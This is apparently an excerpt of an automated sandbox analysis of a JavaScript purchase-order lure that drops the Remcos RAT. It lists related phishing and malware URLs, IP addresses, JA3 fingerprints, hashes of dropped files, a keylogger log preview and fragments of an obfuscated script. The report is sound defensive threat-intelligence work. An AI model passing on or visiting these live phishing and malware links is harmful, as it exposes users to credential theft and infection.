                                                                                                                                          https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.65.44
                                                                                                                                          http://vzgb5l.elnk8.com/83885021a686e36f9150aaf51cbc0afdhGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.2.217
                                                                                                                                          https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=documentGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 151.101.129.181
                                                                                                                                          18037.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.67.6
                                                                                                                                          Codale Electric Supply Health Insurance Benefits Open Enrollment Plan.html.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.1.229
                                                                                                                                          https://unicoengineering.microsoftfederalcloud.com/TvL1x?e=acis.teamangie@amwins.comGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.2.137
                                                                                                                                          https://docs.google.com/presentation/d/e/2PACX-1vSwojdyiXkpmoOGroSpmyU1bXlyQ1pGq6J4xqXeFbLhc-orzr_d9gd79t3Kfc7MNOR4W_H4cofhR0E4/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 151.101.194.137
                                                                                                                                          https://docs.google.com/presentation/d/e/2PACX-1vSwojdyiXkpmoOGroSpmyU1bXlyQ1pGq6J4xqXeFbLhc-orzr_d9gd79t3Kfc7MNOR4W_H4cofhR0E4/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.2.137
                                                                                                                                          ATOM86-ASATOM86NLrequests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          CLOUDFLARENETUSHIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.207.38
                                                                                                                                          Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.220.36
                                                                                                                                          order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 104.21.90.137
                                                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 172.67.177.134
                                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.58.24
                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 172.67.207.38
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 104.21.67.145
                                                                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                          • 172.67.207.38
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                          • 172.67.207.38

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eShipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          svhost.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          https://nam.dcv.ms/0CX72IqyxfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          • 151.101.193.137
                                                                                                                                          37f463bf4616ecd445d4a1937da06e197VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                          • 151.101.193.137

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\ProgramData\remcos\logs.dat

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):144
                                                                                                                                          Entropy (8bit):3.3603882199736725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:rhlKlyKKltVlP4eDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZ3U5YcIeeDAlOWAv
                                                                                                                                          MD5:E26B4B3A278ECDC8E36AEAE1AA27AD7A
                                                                                                                                          SHA1:4EAC8D9915AE5243190817B6540BC0DC3091F682
                                                                                                                                          SHA-256:A32CDD7AF64C2A633D3D1619D01A285ECBFDFAD614BCD3858DFD71D479622FBE
                                                                                                                                          SHA-512:7E59CAFC0201C78EEAE0E1AB1761016173A6E7314980A18B8943801C024A91125312045329D36463C0B0D379550188E083BFCD464EA58B1ACD89B371C53E4EA5
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                          Preview:....[.2.0.2.4./.1.2./.1.4. .0.8.:.0.0.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\1M8V7EFU\json[1].json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):963
                                                                                                                                          Entropy (8bit):5.018384957371898
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                                                          MD5:0F26B79167E7BB356D7AB35E01B90A0E
                                                                                                                                          SHA1:4655C51903490C3536D4A5D0885D17267526E56C
                                                                                                                                          SHA-256:0E7A0C4D81A5F0AB568FCF592D369FF0007E1D5DF1130327353347C79BD2BCA6
                                                                                                                                          SHA-512:B7A8B80DCC0463F5C89DC6F1D8F89E7C570494B9A55A9A05B278371ABDE2D74D3F0A76163A836E8FD7AF94F37A167B9807C441A1C19EF4F04408B509D0204376
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\uploaded_textfile[1]

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):157299
                                                                                                                                          Entropy (8bit):5.496627991893972
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:JhA7MEY0VjVbu/2yThA7MEY0VjohA7MEY0VjVbu/2yThA7MEY0Vj4:JhAG0VjVq/2khAG0VjohAG0VjVq/2kht
                                                                                                                                          MD5:E39538CF60C1A9768333BF00E0262702
                                                                                                                                          SHA1:AB80FC0C03325EA2647FC486B028CBC7CE705B3B
                                                                                                                                          SHA-256:DD3DD3F0DA4553EF81C7FE5AE31F89454187E3B9CBC068A76CA7A9AE8CF2A873
                                                                                                                                          SHA-512:807A7A24CE847771A9CADA7DD8D5A547A8946F2F86B61C8C612AAA675FBF55AD8AB96B381684AE0AECE38E11535C46B2AE284973EC7324F28B6CD7EAACEBD86F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"..KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"..LWLNbkemUWgAuCL = "LldKexUlmLIemxp"..ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"..iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"..ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"..PaRhfNlPdiiNQlW = "iCIlSzWAknQGNiK"..WouuNKWiIWdLbZI = "ZLkLrcHZGfbxmkk"..LxucoeARcJkcGWd = "LmipGasncAqaicQ"..LldbUbcdcUWxcGW = "mofapWOsQLWfLeU"....LGcdPKWeLbGSiBR = "hJLegLkWhCTNddK"..LGGlgbUlbCtKAiR = "WlLLAOiLrUiNPZW"..qALPcklAqeWRpWZ = "zeKumKThZmrnSlN"..UbWiBKpzWGtdUWk = "LplCGTOvJlKWkcZ"..GzKzzBCKGKeQkNW = "hcLolmgfUBjkmcc"..fgAiOWpRvmWcGLU = "khWLKkSZTqdiNoe"..WkKiLJWpxaquPbm = "BiGPAUaTULzKWof"..eeWiuTRpnizCNbJ = "ZpiflakWkgUKCGb"..WAtfLhhphmpZhuL = "PUepqRzWtuzkGsZ"..rioeccGlilhuAbW = "zUihKbLZlLpcWmq"....aWikZROLusGHicC = "LAkhLBpPtfmdKCc"..bZicGiWecQTnUes = "LBWWUpGkmbbcimK"..tucuKmTNNbtUvsf = "WqNLUJTzGWWtApm"..hiPWlCHfApLWAcZ = "CkNJbJrsWxLInbW"..GuazPjlcWAIiAQH = "bxtiGkqWcbGLKKk"..dBkefnWUgkLngQW = "cfNOpKIiAiRGriI"..KzcLjLlpSkCaxcL = "LoBdUUxKJdlfBWc

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):9434
                                                                                                                                          Entropy (8bit):4.928515784730612
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                          MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):64
                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Nlllul55bl/Z:NllU
                                                                                                                                          MD5:D3B86703AAED73DD3EC0A467E8E94A75
                                                                                                                                          SHA1:0F4F7B2D253B1E5317E0523C584323EFE648AFCC
                                                                                                                                          SHA-256:B3FA547E57A764C37C994F3A72929E499C8AAEDA177BDBACD9E7F3C8A34348E1
                                                                                                                                          SHA-512:D358B7BAFDC693B4B7BA03638A67A5D27F3C3C3C222DDC015A0BCA3383510AF3AAB54D088EC6BF995580C3EA3B68AC78A11AE4360486886BA4DAEB2C631FA941
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e................................................@..........

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0y534mcl.xvg.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54xgxq30.sey.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nasa2jg1.ks2.ps1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvdovyfr.vtg.psm1

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                          C:\Users\user\AppData\Local\Temp\bhvFC84.tmp

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3a09f41b, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14680064
                                                                                                                                          Entropy (8bit):1.0144168073315183
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:9DPwX329Pr9PA60q0mNZG3HjW7CsoGn98hQjW7CsoGn98y7CsoGQaGCjIWsXtXXo:DpI6l4c1nq5iYT8KAKAuND
                                                                                                                                          MD5:FC06D809F655320826194E980391A317
                                                                                                                                          SHA1:9AFAD5762B586952AC9C1A8BF6AD86B161FA2784
                                                                                                                                          SHA-256:0DAF21D1CD3ADE7C220ADDF773783D0D427A18A538E670AC674A1A01DB992144
                                                                                                                                          SHA-512:6B16C3C52540AD03453C3896A90C6E6F7B466A0525F86A5089287777CCC6F272B1D82BFFC20D56F9B04DAA7737184C7F3BCC6F11394C1D47D327C076612D3038
                                                                                                                                          Malicious:false
                                                                                                                                          Preview::...... ........................{......................../..........{5......|..h.1..................................{..............................................................................................V...........eJ......n........................................................................................................... ............{C..................................................................................................................................................................................................{...........................................|7..................k.......|...........................#......h.1.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                          C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2
                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Qn:Qn
                                                                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:..

                                                                                                                                          C:\Windows\Temp\???2????4????4????5.js

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):157299
                                                                                                                                          Entropy (8bit):5.496627991893972
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:JhA7MEY0VjVbu/2yThA7MEY0VjohA7MEY0VjVbu/2yThA7MEY0Vj4:JhAG0VjVq/2khAG0VjohAG0VjVq/2kht
                                                                                                                                          MD5:E39538CF60C1A9768333BF00E0262702
                                                                                                                                          SHA1:AB80FC0C03325EA2647FC486B028CBC7CE705B3B
                                                                                                                                          SHA-256:DD3DD3F0DA4553EF81C7FE5AE31F89454187E3B9CBC068A76CA7A9AE8CF2A873
                                                                                                                                          SHA-512:807A7A24CE847771A9CADA7DD8D5A547A8946F2F86B61C8C612AAA675FBF55AD8AB96B381684AE0AECE38E11535C46B2AE284973EC7324F28B6CD7EAACEBD86F
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:qiWGNGNfWuxibBW = "KNukGUBZCLLcBJa"..KLkOkOuGhjxmLzz = "cnfLuvcWWufiKBI"..LWLNbkemUWgAuCL = "LldKexUlmLIemxp"..ugchgKaBQLpmciK = "OoOGKLGWLNLUAkS"..iLhbTaLLgldfoWH = "TmKnNJhUniaWniN"..ubvpLiWLAkeAdhc = "keLWJcKfPlBiKLz"..PaRhfNlPdiiNQlW = "iCIlSzWAknQGNiK"..WouuNKWiIWdLbZI = "ZLkLrcHZGfbxmkk"..LxucoeARcJkcGWd = "LmipGasncAqaicQ"..LldbUbcdcUWxcGW = "mofapWOsQLWfLeU"....LGcdPKWeLbGSiBR = "hJLegLkWhCTNddK"..LGGlgbUlbCtKAiR = "WlLLAOiLrUiNPZW"..qALPcklAqeWRpWZ = "zeKumKThZmrnSlN"..UbWiBKpzWGtdUWk = "LplCGTOvJlKWkcZ"..GzKzzBCKGKeQkNW = "hcLolmgfUBjkmcc"..fgAiOWpRvmWcGLU = "khWLKkSZTqdiNoe"..WkKiLJWpxaquPbm = "BiGPAUaTULzKWof"..eeWiuTRpnizCNbJ = "ZpiflakWkgUKCGb"..WAtfLhhphmpZhuL = "PUepqRzWtuzkGsZ"..rioeccGlilhuAbW = "zUihKbLZlLpcWmq"....aWikZROLusGHicC = "LAkhLBpPtfmdKCc"..bZicGiWecQTnUes = "LBWWUpGkmbbcimK"..tucuKmTNNbtUvsf = "WqNLUJTzGWWtApm"..hiPWlCHfApLWAcZ = "CkNJbJrsWxLInbW"..GuazPjlcWAIiAQH = "bxtiGkqWcbGLKKk"..dBkefnWUgkLngQW = "cfNOpKIiAiRGriI"..KzcLjLlpSkCaxcL = "LoBdUUxKJdlfBWc

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Unicode text, UTF-16, little-endian text, with very long lines (1540), with CRLF line terminators
                                                                                                                                          Entropy (8bit):4.4949425211620575
                                                                                                                                          TrID:
                                                                                                                                          • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                          • MP3 audio (1001/1) 33.33%
                                                                                                                                          File name:PO_0099822111ORDER.js
                                                                                                                                          File size:5'038 bytes
                                                                                                                                          MD5:9c23d2a7acc6acc81022dee56521c2ba
                                                                                                                                          SHA1:40a93bafef8bfeec099f8f8f758336fe41a82a81
                                                                                                                                          SHA256:9b9059af739b167db6afce5129997e489dbb7baa3af27c8da5a68d564c2ed84e
                                                                                                                                          SHA512:193760ec2b498a40d2eb932314668aaf07c15d69b64ade12fe75e62d92a0a5ca34201f8f1c4a070b0e574e433fdf62fbe1785bbd2279f8e7fd58d2080df3aa88
                                                                                                                                          SSDEEP:48:zto05EfkLolvMHs8Zcj6qHs9aCgUvZ5LbmnpFP:ztFqfkL+vhj6qHsl5Z5LyrP
                                                                                                                                          TLSH:B3A12AB59B68439C6CF94B1AB71300AD071AF809987EC78C187CCC954B67E1949AEFCD
                                                                                                                                          File Content Preview:..............v.a.r. .r.e.v.o.c.a.b.l.y. .=. .".h.B0=...2..&G0=./.4.X&.0=...4..&O0=.>.5.t.B0=...2..&G0=./.4.X&.0=...4..&O0=.>.5.t.B0=...2..&G0=./.4.X&.0=...4..&O0=.>.5.p.B0=...2..&G0=./.4.X&.0=...4..&O0=.>.5.s.B0=...2..&G0=./.4.X&.0=...4..&O0=.>.5.:.B0=..

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:68d69b8bb6aa9a86

                                                                                                                                          Network Behavior

